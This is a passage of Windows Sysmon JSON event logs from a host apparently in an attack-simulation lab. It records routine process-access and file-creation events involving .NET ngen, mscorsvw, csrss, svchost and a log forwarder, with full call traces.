C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:02.529","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-13A6-5F25-0000-001069E91000}","TargetProcessId":"3960","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:02","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8942,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:02.576\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-13A6-5F25-0000-0010DBEC1000}\r\nTargetProcessId: 3956\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:02.576","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-13A6-5F25-0000-0010DBEC1000}","TargetProcessId":"3956","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:02","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8943,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:02.576\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-13A6-5F25-0000-0010DBEC1000}\r\nTargetProcessId: 3956\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:02.576","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-13A6-5F25-0000-0010DBEC1000}","TargetProcessId":"3956","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:03:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:02","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8944,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:02.576\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-13A6-5F25-0000-0010DBEC1000}\r\nTargetProcessId: 3956\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:02.576","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-13A6-5F25-0000-0010DBEC1000}","TargetProcessId":"3956","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:02","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8945,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:02.685\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3596\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:02.685","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3596","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:03:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:02","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8946,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:03:02.857\r\nProcessGuid: {E2A3D6B1-13A6-5F25-0000-0010DBEC1000}\r\nProcessId: 3956\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\f74-0\\UIAutomationTypes.dll\r\nCreationUtcTime: 2020-08-01 07:03:02.857","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:03:02.857","ProcessGuid":"{E2A3D6B1-13A6-5F25-0000-0010DBEC1000}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\f74-0\\UIAutomationTypes.dll","CreationUtcTime":"2020-08-01 07:03:02.857","EventReceivedTime":"2020-08-01 07:03:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:02","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8947,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:02.904\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-13A6-5F25-0000-0010CAF01000}\r\nTargetProcessId: 5068\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:02.904","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-13A6-5F25-0000-0010CAF01000}","TargetProcessId":"5068","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:02","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8948,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:02.904\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-13A6-5F25-0000-0010CAF01000}\r\nTargetProcessId: 5068\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:02.904","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-13A6-5F25-0000-0010CAF01000}","TargetProcessId":"5068","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:03:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:02","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8949,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:02.904\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-13A6-5F25-0000-0010CAF01000}\r\nTargetProcessId: 5068\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:02.904","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-13A6-5F25-0000-0010CAF01000}","TargetProcessId":"5068","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3